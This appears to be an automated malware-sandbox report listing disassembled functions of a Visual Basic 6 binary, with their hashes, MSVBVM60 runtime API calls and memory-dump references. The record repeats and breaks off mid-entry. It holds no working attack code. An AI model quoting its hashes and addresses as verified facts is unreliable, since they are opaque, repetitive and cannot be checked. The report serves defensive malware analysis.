Opcode ID: cf3ab2ae2adb5bb4c47874d4caa9ec11272c050c9bbc593e4460deddaa42495f
Instruction ID: 2258cb0996f04db46dac934d03965dd60a716a157fe6f4ee4cac8ab8ed0125e9
Opcode Fuzzy Hash: cf3ab2ae2adb5bb4c47874d4caa9ec11272c050c9bbc593e4460deddaa42495f
Instruction Fuzzy Hash: 73316EB1A00119DFCB14DFA4ED84DEE7B79EF88300F50856AE506E3261DB385986CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00417469, Relevance: 27.1, APIs: 18, Instructions: 96COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 246257148df8c58a63151417e2fa6cf9abfb38d00579c66028cbeba8a36e54a7
Instruction ID: 1778df844528236c0a987ac4d2ed461284e935b427befae0ad271591413caba1
Opcode Fuzzy Hash: 246257148df8c58a63151417e2fa6cf9abfb38d00579c66028cbeba8a36e54a7
Instruction Fuzzy Hash: A13150B5A00119DFCB14DFA4ED84DEE7779EF88300F10856AE506E3261DB385986CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004174E1, Relevance: 27.1, APIs: 18, Instructions: 96COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 36b3d8d5935acc63e5f9ea94afa97a512f975b8c77cc1bcf6976f7907015c398
Instruction ID: f2cb84cfdc36a53c26a53c404fdd6523f55abe18ffc8f9b7dbfd1f77219752b6
Opcode Fuzzy Hash: 36b3d8d5935acc63e5f9ea94afa97a512f975b8c77cc1bcf6976f7907015c398
Instruction Fuzzy Hash: FD315075A00119DFCB14DFA4ED94DEE7779EF88300B10456AE506E3261DB349986CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041742D, Relevance: 27.1, APIs: 18, Instructions: 94COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 07de24749f671f96814f1a4586ac660af873eea27dc505617471f5a8f1a16d63
Instruction ID: 6a6c65185a8990ed76a7925615099f76a1e8909006d367d433fa78fd926de25a
Opcode Fuzzy Hash: 07de24749f671f96814f1a4586ac660af873eea27dc505617471f5a8f1a16d63
Instruction Fuzzy Hash: 70318071A00158DFCB14DBE4ED84DEE7B79EF88300B10456AE505E3261DA345986CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004174FF, Relevance: 27.1, APIs: 18, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 77e56cfcc552817e7ee37a59d80ef930704b94eed13a9294e71aa4068a8ebed6
Instruction ID: 866caa4c8eac6f19f1194a02b11e2fb1ed896fcf014f3bed80b5db7ea06780d3
Opcode Fuzzy Hash: 77e56cfcc552817e7ee37a59d80ef930704b94eed13a9294e71aa4068a8ebed6
Instruction Fuzzy Hash: A53160B1A00158DFCB14DBA4ED94DEE7B79EF88300F10856AE506A3261DB345986CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00417487, Relevance: 27.1, APIs: 18, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 7c020b0f20d6a8b4d01058b6d9886427e5cc45ac16c8490aeb7492273ba51688
Instruction ID: b6ea956760585b48cef5c944cb0b6b88b320cc0c6bf33020a7601fb965c6dcd1
Opcode Fuzzy Hash: 7c020b0f20d6a8b4d01058b6d9886427e5cc45ac16c8490aeb7492273ba51688
Instruction Fuzzy Hash: B33172B1A00118DFCB14DFA4ED84DEE7779EF88300F10456AE506E3261DB345986CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004174A5, Relevance: 27.1, APIs: 18, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 02c7f454d40560d9c6661f647330d47c8efe8f1cef0e828d259a4e05a1306448
Instruction ID: 4ac9cb3760513d78d10cab075c76733cbf34af43b16f8391a80bd0b5696eddcc
Opcode Fuzzy Hash: 02c7f454d40560d9c6661f647330d47c8efe8f1cef0e828d259a4e05a1306448
Instruction Fuzzy Hash: 57316071A00159DFCB14DFA4ED84DEEBB79EF88300F50456AE506A3261DB346986CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041751D, Relevance: 27.1, APIs: 18, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 94c476b80a82efe6d398e93fd76fd4f9bee1e122c1bd37c77481171981cade68
Instruction ID: 685c137c93b8fd798157623ef34c738d9d6605c7449a0796629f3e9ff1c3c11f
Opcode Fuzzy Hash: 94c476b80a82efe6d398e93fd76fd4f9bee1e122c1bd37c77481171981cade68
Instruction Fuzzy Hash: 383160B1A00158DFCB14DBA4ED84DEEB779FF88300B10456AE506E3261DB345986CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041753B, Relevance: 27.1, APIs: 18, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 8bb761deafcd7e2ded91a160ce823c526f59d3b1b33068874666e1dc9ed13cd2
Instruction ID: abceff13d7d3de1d96dc032862a960644500f493d2a40e7a9fa547c81a193ae3
